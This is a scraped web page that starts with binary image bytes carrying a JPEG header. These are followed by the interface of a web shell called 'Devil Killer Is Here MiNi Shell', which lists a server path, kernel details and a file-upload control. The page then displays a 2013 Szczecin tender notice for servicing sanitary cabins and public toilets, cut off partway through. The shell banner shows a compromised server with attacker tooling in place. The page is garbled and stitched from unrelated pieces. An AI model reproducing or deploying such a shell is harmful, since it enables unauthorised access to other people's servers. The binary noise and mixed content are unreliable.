JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20131122/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20131122/480496-N-2013.html

<p class="kh_header"><b>Szczecin: KOMPLEKSOWA OBSŁUGA KABIN SANITARNYCH 
I SZALETÓW PUBLICZNYCH (w podziale na części)</b><br>
<b>Numer ogłoszenia: 480496 - 2013; data zamieszczenia: 22.11.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Usług Komunalnych , ul. Ku Słońcu 125a, 71-080 Szczecin, woj. zachodniopomorskie, tel. 091 484 82 94, faks 091 484 80 55.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.zuk.szczecin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: samorządowy zakład budżetowy.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KOMPLEKSOWA OBSŁUGA KABIN SANITARNYCH 
I SZALETÓW PUBLICZNYCH (w podziale na części).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest kompleksowa obsługa kabin sanitarnych i szaletów publicznych - w podziale na części:
     CZĘŚĆ I: 	Kompleksowa obsługa kabin sanitarnych na terenie cmentarzy komunalnych w Szczecinie
     CZĘŚĆ II:	     Kompleksowa obsługa kabin sanitarnych na terenie lasów miejskich 
				     w Szczecinie
     CZĘŚĆ III:	Kompleksowa obsługa kabiny sanitarnej przy terenie Różanki 
		                     w Szczecinie

     CZĘŚĆ IV:	Kompleksowa obsługa kabin sanitarnych na kąpieliskach miejskich 
	                        w Szczecinie
CZĘŚĆ V:	Kompleksowa obsługa szaletu publicznego znajdującego się przy Bramie   Głównej Cmentarza Centralnego w Szczecinie
     CZĘŚĆ VI: 	Kompleksowa obsługa szaletu publicznego znajdującego się przy 
				ul. Zegadłowicza w Szczecinie 
    CPV:
90600000-3  Usługi sprzątania oraz usługi sanitarne na obszarach miejskich lub wiejskich
                     oraz usługi powiązane
       90000000-7 	Usługi odbioru ścieków, usuwania odpadów, czyszczenia/sprzątania 
                             i usługi ekologiczne  
2.	Przedmiot zamówienia zostaje podzielony na sześć części:
	1) 	CZĘŚĆ I: Kompleksowa obsługa kabin sanitarnych na terenie cmentarzy 					       komunalnych w Szczecinie:
   	a)   kompleksowa obsługa 7 szt. kabin sanitarnych,	które wystawione zostaną na 	      	      Cmentarzu Centralnym w Szczecinie w okresie:
           A.  od 01.01.2014 r. do 16.03.2014 r. - (11 tygodni) jeden serwis w tyg. (piątek), 		czyli 77 serwisów,
           B.   od 17.03.2014 r. do 29.10.2014 r. - (32,5 tygodnia) dwa serwisy w tyg. 			(poniedziałek, czwartek), czyli 455 serwisów,
           C. od 30.10.2014 r. do 03.11.2014 r.- (5 dni) dwa serwisy dziennie, czyli 
                 70 serwisów,
           D.  od 04.11.2014 r. do 31.12.2014 r. - (8 tygodni) jeden serwis w tyg. (piątek), 		czyli 56 serwisów,
           b) kompleksowa obsługa 40 szt. kabin sanitarnych, które wystawione zostaną 
	      na terenie Cmentarza Centralnego w Szczecinie (rozstawionych w dniu 
                  29.10.2014 r.) w okresie:
                  od 30.10.2014 r. do 03.11.2014 r. - (5 dni) dwa serwisy dziennie, czyli 
                  400 serwisów,
           c) kompleksowa obsługa 3 szt. kabin sanitarnych, które wystawione zostaną 
	      na terenie Cmentarza Zdroje, Cmentarza Wielgowo, Cmentarza Płonia (po 1 szt.
                  na każdym cmentarzu) w okresach:
                  A. od 01.01.2014 r. do 29.10.2014 r. - (43 tygodnie) jeden serwis w tyg. (piątek), 		czyli 129 serwisów,
	      B. od 30.10.2014 r. do 03.11.2014 r. - (5 dni) jeden serwis dziennie, czyli 
	            15 serwisów,
                  C. od 04.11.2014 r. do 31.12.2014 r. - (8 tygodni) jeden serwis w tyg. (piątek), 		czyli 24 serwisy,
            d) kompleksowa obsługa 2 szt. kabin sanitarnych, które wystawione zostaną 
                  na  terenie Cmentarza Dąbie w okresach:
	       A.  od 01.01.2014 r. do 16.03.2014 r. - (11 tygodni) jeden serwis w tyg. (piątek), 		 czyli 22 serwisy,
	       B.  od 17.03.2014 r. do 29.10.2014 r. - (32,5 tygodnie) dwa serwisy w tyg. 			 (poniedziałek, piątek), czyli 130 serwisów,
	       C. od 30.10.2014 r. do 03.11.2014 r. - (5 dni) jeden serwis dziennie, czyli 
                         10 serwisów,
	       D. od 04.11.2014 r. do 31.12.2014 r. - (8 tygodni) jeden serwis w tyg. (piątek), 		 czyli 16 serwisów,


            e) kompleksowa obsługa 6 szt. kabin sanitarnych, które wystawione zostaną 
    na terenie Cmentarza Dąbie - 2 szt., Cmentarza Zdroje - 2 szt., Cmentarza
    Wielgowo - 1 szt., Cmentarza Płonia - 1 szt. (rozstawionych w dniu 29.10.2014 r.)
    w okresie:
	    od 30.10.2014 r. do 03.11.2014 r. - (5 dni) jeden serwis dziennie, czyli 
               30 serwisów.

	2)	CZĘŚĆ II: Kompleksowa obsługa kabin sanitarnych na terenie lasów miejskich 
				          w Szczecinie
      a)	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
           na ścieżce przyrodniczo - edukacyjnej przy ul. Miodowej w okresie:
A.  	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
	b)  kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie na 	       	     Polanie Sportowej (w rejonie ul. Zegadłowicza) w okresie:
 A. 	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
 B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
 C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
 czyli 57 serwisów,
      c) kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
		 na polanie przy Jeziorze Głębokim w okresie: 
 A. styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
  B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
  C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
  czyli 57 serwisów,
d)   kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie na
      polanie przy ul. Kupczyka z parkingiem leśnym w okresie: 
      A. 	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
  B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
  C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
  czyli 57 serwisów,
       e) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
na Polanie Czerwonej przy ul. Spacerowej w okresie:
       A.	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
  B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
	 f) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie 
w Parku Leśnym Zdroje przy Jeziorze Szmaragdowym w okresie:
A.	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
	 g) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie w Parku Leśnym Zdroje przy Polanie Widok w okresie:
A.	styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,
        h) 	kompleksowa obsługa 1 szt. kabiny sanitarnej, która wystawiona zostanie w Parku Leśnym Klęskowo w okresie:
A. styczeń, luty, marzec, październik, listopad, grudzień - jeden serwis w ciągu 
2 tygodni (piątek), 
B. 	kwiecień, wrzesień - jeden serwis w tygodniu (piątek), 
C.	maj, czerwiec, lipiec, sierpień - dwa serwisy w tygodniu (poniedziałek, piątek),
czyli 57 serwisów,

     3) CZĘŚĆ III: Kompleksowa obsługa kabiny sanitarnej przy terenie Różanki 
				      	 w Szczecinie
      a) kompleksowa obsługa 1 szt. kabiny sanitarnej z umywalką, przystosowanej 
	      dla osób niepełnosprawnych, która wystawiona zostanie przy Różance przy 
	      ul. Fałata w okresie:
            od 17.03.2014 r. - 14.11.2014 r. - trzy serwisy w tygodniu (poniedziałki, środy, 	       piątki, do godz. 10.00, również w dni świąteczne), czyli 105 serwisów,	

     4) 	CZĘŚĆ IV: Kompleksowa obsługa kabin sanitarnych na kąpieliskach miejskich
				      	w Szczecinie
 a)  kompleksowa obsługa 3 szt. kabin sanitarnych z umywalką, przystosowanych 
	       dla osób niepełnosprawnych, które wystawione zostaną na kąpielisku Dąbie,
       Dziewoklicz i Głębokie (po 1 szt. na każdym kąpielisku) w okresie:
	       od 15.06.2014 r. do 31.08.2014 r. - jeden serwis w miesiącu (daty każdorazowo 	       uzgadniane z kierownikami poszczególnych kąpielisk), czyli 9 serwisów,

     5) 	CZĘŚĆ V:   Kompleksowa obsługa szaletu publicznego znajdującego się przy 					          Bramie Głównej Cmentarza Centralnego w Szczecinie 
             a) 	kompleksowa, całoroczna obsługa szaletu publicznego znajdującego się przy 	Bramie Głównej Cmentarza Centralnego w zakresie:
  	       A.  zapewnienia obsługi osobowej w godzinach otwarcia, tj.:
	             - od 01.01.2014 r. do 31.03.2014 r., poniedziałek - piątek, w godz. 8.00 - 		    16.00,
		 -  od 01.04.2014 r. do 11.11.2014 r., poniedziałek - niedziela, w godz. 8.00 - 		    18.00 (w dniu 01.11.2014 r. - w godz. 8.00 - 20.00),
		 - od 12.11.2014 r. do 31.12.2014 r., poniedziałek - piątek, w godz. 8.00 - 		    16.00;
Wykonawca zobowiązany będzie otwierać i zamykać szalet punktualnie 
o  wyznaczonej godzinie. 
Przed otwarciem szaletu Wykonawca będzie zobowiązany:
-  zmyć ściany, posadzki, drzwi, sedesy gorącą wodą z dodatkiem proszków 
    i płynów myjących,
-  wywietrzyć pomieszczenia szaletu,
- powycierać kurze z luster, parapetów, rur, kaloryferów oraz wszelkiego
    rodzaju wyposażenia ruchomego.

	       B. utrzymania szaletu publicznego wraz z wyposażeniem w należytym stanie 		 sanitarnym i estetycznym, zgodnie z zaleceniami Państwowej Inspekcji
            	 Sanitarnej, Państwowej Inspekcji Pracy, przepisami p.poż., oraz bieżącej 		 dezynfekcji pomieszczeń i urządzeń sanitarnych płynem typu Ace 
                  i Domestos; W trakcie obsługi szaletu Wykonawca zobowiązany będzie -
                  na danej zmianie - co najmniej 2-krotnie zmyć gorącą wodą z dodatkiem
                  proszków ew. płynów myjących muszle klozetowe, pisuary, umywalki oraz
                  posadzki. Po zmyciu posadzek, należy je przetrzeć środkiem dezynfekującym.
                  Wszystkie pomieszczenia oraz wyposażenie szaletu (szafy, szafki, stoły,
                  krzesła, kosze na odpadki, lustra, itp.) oraz okna i drzwi należy utrzymać 
                  na bieżąco w czystości.
	 C.	 wyposażenie szaletu publicznej w papier toaletowy, ręczniki jednorazowego 		 użytku, mydło, środki czystości i dezynfekująco - odkażające, itp.,
	 D.	 utrzymania urządzeń sanitarnych w stałej sprawności, w tym wykonywanie 		 drobnych czynności konserwatorskich, tj. m. in. wymiana wężyków,
                  uszczelek, przepalonych żarówek, baterii umywalkowych, desek sedesowych,
                  itp.,
	 E.	 udrażnianie przewodów kanalizacyjnych we własnym zakresie wewnątrz 		 pomieszczeń szaletu,
	 F.	 utrzymanie na bieżąco w czystości i porządku terenu bezpośrednio
                 przyległego do szaletu publicznego, tj. m.in. zamiatanie, odśnieżanie,
            	posypywanie piaskiem, ustawienie pojemnika na odpady, itp.,
	   
     6)	 CZĘŚĆ VI: Kompleksowa obsługa szaletu publicznego znajdującego się przy 
					ul. Zegadłowicza w Szczecinie
             a)  kompleksowa obsługa szaletu publicznego znajdującego się przy ul. Zegadłowicza 
	      w zakresie:
  	      A.  zapewnienia obsługi osobowej w godzinach otwarcia, tj.:
	               -  od 01.01.2014 r. do 28.02.2014 r., poniedziałek - niedziela, w godz. 8.00 		       - 16.00,
		    -  od 01.03.2014 r. do 31.03.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 17.00,
		    -  od 01.04.2014 r. do 30.09.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 20.00,
		    -  od 01.10.2014 r. do 31.10.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 18.00,
		    -  od 01.11.2014 r. do 30.11.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 17.00,
		    -  od 01.12.2014 r. do 31.12.2014 r., poniedziałek - niedziela, w godz. 8.00 		        - 16.00;
Wykonawca zobowiązany będzie otwierać i zamykać szalet punktualnie o wyznaczonej godzinie. 
Przed otwarciem szaletu Wykonawca będzie zobowiązany:
-  zmyć ściany, posadzki, drzwi, sedesy gorącą wodą z dodatkiem proszków 
    i płynów myjących,
-  wywietrzyć pomieszczenia szaletu,
- powycierać kurze z luster, parapetów, rur, kaloryferów oraz wszelkiego
    rodzaju wyposażenia ruchomego.


	       B. utrzymania szaletu publicznego wraz z wyposażeniem w należytym stanie 		 sanitarnym i estetycznym, zgodnie z zaleceniami Państwowej Inspekcji
            	 Sanitarnej, Państwowej Inspekcji Pracy, przepisami p.poż., oraz bieżącej 		 dezynfekcji pomieszczeń i urządzeń sanitarnych płynem typu Ace 
                  i Domestos; W trakcie obsługi szaletu Wykonanwca zobowiązany będzie -
                  na danej zmianie - co najmniej 2-krotnie zmyć gorącą wodą z dodatkiem
                  proszków ew. płynów myjących muszle klozetowe, pisuary, umywalki oraz
                  posadzki. Po zmyciu posadzek, należy je przetrzeć środkiem dezynfekującym.
                  Wszystkie pomieszczenia oraz wyposażenie szaletu (szafy, szafki, stoły, 
                  krzesła, kosze na odpadki, lustra, itp.) oraz okna i drzwi należy utrzymać 
                  na bieżąco w czystości.
	 C.	 wyposażenie szaletu publicznego w papier toaletowy, ręczniki jednorazowego 		 użytku, mydło, środki czystości i dezynfekująco - odkażające, itp.,
	 D.	 utrzymania urządzeń sanitarnych w stałej sprawności, w tym wykonywanie 		 drobnych czynności konserwatorskich, tj. m. in. wymiana wężyków,
                  uszczelek, przepalonych żarówek, baterii umywalkowych, desek sedesowych,
                  itp.,
	 E.	 udrażnianie przewodów kanalizacyjnych we własnym zakresie wewnątrz 		 pomieszczeń szaletu,
	 F.	 utrzymanie na bieżąco w czystości i porządku terenu bezpośrednio
                 przyległego do szaletu publicznego, tj. m.in. zamiatanie, odśnieżanie,
            	posypywanie piaskiem, ustawienie pojemnika na odpady, itp.
3.	Kompleksowa obsługa w przypadku kabin sanitarnych obejmuje: obsługę, wynajem, ubezpieczenie, posadowienie, transport na koszt i ryzyko Wykonawcy..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.60.00.00-3, 90.00.00.00-7.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 6.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- dot. części I, II, III, IV:
Warunek zostanie uznany za spełniony, jeżeli Wykonawca wykaże, że posiada uprawnienia do prowadzenia działalności w zakresie opróżniania zbiorników bezodpływowych i transportu nieczystości ciekłych - zgodnie z ustawą z dnia 
13 września 1996 r. o utrzymaniu czystości i porządku w gminach (t.j. Dz. U. z 2012 poz. 391 ze zmianami)</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Ponadto wykonawcy mają dołączyć do oferty następujące dokumenty:
       1)  ofertę cenową - zgodnie z rozdziałem I pkt 3 SIWZ;
 	W przypadku składania oferty wspólnej należy złożyć jedną ofertę cenową;
         2) 	odpowiednie pełnomocnictwa;  
	Tylko w sytuacjach określonych w rozdziale I pkt 5 zdanie drugie SIWZ lub 
	w przypadku składania oferty wspólnej (rozdział III pkt 1 SIWZ); 
       3)	oświadczenie według wzoru stanowiącego załącznik nr 1 do SIWZ, wskazujące część 	zamówienia, której wykonanie wykonawca powierzy podwykonawcom (jeżeli 	wykonawca przewiduje udział podwykonawców);
            W przypadku składania oferty wspólnej należy złożyć jedno oświadczenie.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zuk.szczecin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 02.12.2013 godzina 10:00, miejsce: Siedziba Zamawiającego - 71-080 Szczecin, ul. Ku Słońcu 125A; pok. 17-18.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie dotyczy umowy ramowej.
2. Termin wykonania zamówienia: 
1)  część I: od dnia 01.01.2014 r. do dnia 31.12.2014 r.
2)  część II: od dnia 02.01.2014 r. do dnia 31.12.2014 r.
3)  część III: od dnia 17.03.2014 r. do dnia 14.11.2014 r.
4)  część IV: od dnia 15.06.2014 r. do dnia 31.08.2014 r.
5)  część V: od dnia 01.01.2014 r. do dnia 31.12.2014 r.
6)  część VI: od dnia 01.01.2014 r. do dnia 31.12.2014 r.
3. Cena ofertowa winna zawierać wszelkie koszty związane z realizacją przedmiotu zamówienia, w tym m.in.:
1)	dot. części V - w cenie oferty Wykonawca zobowiązany jest również ująć koszt materiałów do drobnych czynności konserwatorskich i piasku do posypywania,
2)	 dot. części VI - w cenie oferty Wykonawca zobowiązany jest  również ująć koszt materiałów do drobnych czynności konserwatorskich i piasku do posypywania.
4. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana na zasadzie SPEŁNIA/NIE SPEŁNIA..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kompleksowa obsługa kabin sanitarnych na terenie cmentarzy komunalnych w Szczecinie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Kompleksowa obsługa kabin sanitarnych na terenie cmentarzy komunalnych w Szczecinie:
   	a)   kompleksowa obsługa 7 szt. kabin sanitarnych,	które wystawione zostaną na 	      	      Cmentarzu Centralnym w Szczecinie w okresie:
           A.  od 01.01.2014 r. do 16.03.2014 r. - (11 tygodni) jeden serwis w tyg. (piątek), 		czyli 77 serwisów,
           B.   od 17.03.2014 r. do 29.10.2014 r. - (32,5 tygodnia) dwa serwisy w tyg. 			(poniedziałek, czwartek), czyli 455 serwisów,
           C. od 30.10.2014 r. do 03.11.2014 r.- (5 dni) dwa serwisy dziennie, czyli 
                 70 serwisów,
           D.  od 04.11.2014 r. do 31.12.2014 r. - (8 tygodni) jeden serwis w tyg. (piątek), 		czyli 56 serwisów,
           b) kompleksowa obsługa 40 szt. kabin sanitarnych, które wystawione zostaną 
	      na terenie Cmentarza Centralnego w Szczecinie (rozstawionych w dniu 
                  29.10.2014 r.) w okresie:
                  od 30.10.2014 r. do 03.11.2014 r. - (5 dni) dwa serwisy dziennie, czyli 
                  400 serwisów,
           c) kompleksowa obsługa 3 szt. kabin sanitarnych, które wystawione zostaną 
	      na terenie Cmentarza Zdroje, Cmentarza Wielgowo, Cmentarza Płonia (po 1 szt.
                  na każdym cmentarzu) w okresach:
                  A. od 01.01.2014 r. do 29.10.2014 r. - (43 tygodnie) jeden serwis w tyg. (piątek), 		czyli 129 serwisów,
